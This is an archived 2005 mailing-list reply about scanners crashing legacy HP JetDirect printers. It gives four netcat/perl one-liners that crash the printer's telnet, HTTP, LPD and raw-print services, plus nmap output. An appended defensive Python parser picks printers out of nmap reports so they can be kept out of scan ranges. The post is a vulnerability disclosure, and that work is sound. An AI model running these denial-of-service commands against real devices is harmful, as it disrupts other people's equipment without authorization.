Re: Experiences with company nCircle and their IP360 product

From: Marco Ivaldi (raptor@0xdeadbeef.info)
Date: Fri Dec 02 2005 - 13:50:41 EST


> One other thing I've seen with nCircle (& a few other scanners), if you
> run internally & have any legacy HP jetdirect printers located on your
> network, you may want to check with nCircle to see if their scans still
> lock up those printers.

Actually, it's usually fairly easy to DoS printers, especially if they are
using an old firmware release. Here are a few ways to reproduce some HP
JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 --
it's quite old, I didn't bother to test newer releases):

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

1) TELNET. Crash all network services:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

Pretty lame, isn't it? In case someone's interested I've scanned the funny
stack dump printed on paper and put it on-line here:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

Sincerely,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
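
An added example, not part of the original post: a small parser that reads nmap reports in the format shown above and picks out hosts that look like network printers, so they can be kept out of automated scan ranges. The hostnames, addresses and the `fragile_printers` helper are constructed for illustration; the header and port-line patterns assume nmap's normal text output.

```python
import re

# Constructed sample in the report format shown in the post.
# Addresses come from the 192.0.2.0/24 documentation range.
SAMPLE = """\
Interesting ports on printer.example.test (192.0.2.10):
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
OS details: HP printer w/JetDirect card
Interesting ports on web.example.test (192.0.2.20):
22/tcp   open  ssh        OpenSSH 3.9p1
80/tcp   open  http       Apache httpd
Interesting ports on 192.0.2.30:
515/tcp  open   printer?
9100/tcp closed jetdirect
"""

HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for) (.+?):?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)\s*(.*)$")
PRINT_PORTS = {515, 9100}  # lpd and raw-print ports from the post (515 alone may be a Unix lpd host)


def fragile_printers(report):
    """Return {ip: [reasons]} for hosts that look like network printers."""
    hosts, current = {}, None
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            ip = re.search(r"\(([^)]+)\)$", m.group(1))  # "name (ip)" or bare ip
            current = ip.group(1) if ip else m.group(1)
            hosts[current] = []
            continue
        if current is None:
            continue
        p = PORT_RE.match(line)
        if p and p.group(2) == "open":
            port, banner = int(p.group(1)), p.group(4)
            if port in PRINT_PORTS:
                hosts[current].append(f"{port}/tcp open")
            if "jetdirect" in banner.lower():
                hosts[current].append(f"banner on {port}/tcp")
        elif line.startswith(("Device type:", "OS details:")) and "print" in line.lower():
            hosts[current].append(line.split(":", 1)[0])
    return {ip: why for ip, why in hosts.items() if why}
```

The returned addresses can be written one per line to an exclusion file, and the recorded reasons help decide which hosts need a manual check before they are scanned at all.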


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:13 EDT